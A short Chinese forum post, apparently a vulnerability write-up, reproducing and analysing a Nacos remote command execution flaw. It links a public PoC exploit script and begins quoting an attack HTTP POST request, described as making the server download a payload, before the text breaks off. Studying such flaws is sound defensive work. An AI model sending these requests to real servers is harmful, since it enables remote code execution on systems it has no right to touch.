fkalis 在 nacos漏洞复现分析 中发帖
刚刚发的文章被删了,还是发一些之前的其他的简单文章吧,刚刚加入大家见谅
个人理解的漏洞原理:本质实际上就是在20年那个未授权的基础上添加了命令执行,但是也导致了该漏洞的利用条件变得比较苛刻,目前测试需要比较多的条件才能进行漏洞利用**
1. 0day作者的poc地址
https://github.com/ayoundzw/nacos-poc/blob/main/exploit.py
2. poc提取
根据作者的poc,其本质上就是两种poc数据包,下面的poc并不一定可以直接使用,下面漏洞分析的时候会解答
利用该poc去服务器地址远程下载payload代码
POST /nacos/v1/cs/ops/data/removal HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: python-requests/2.31.0
Accept-En...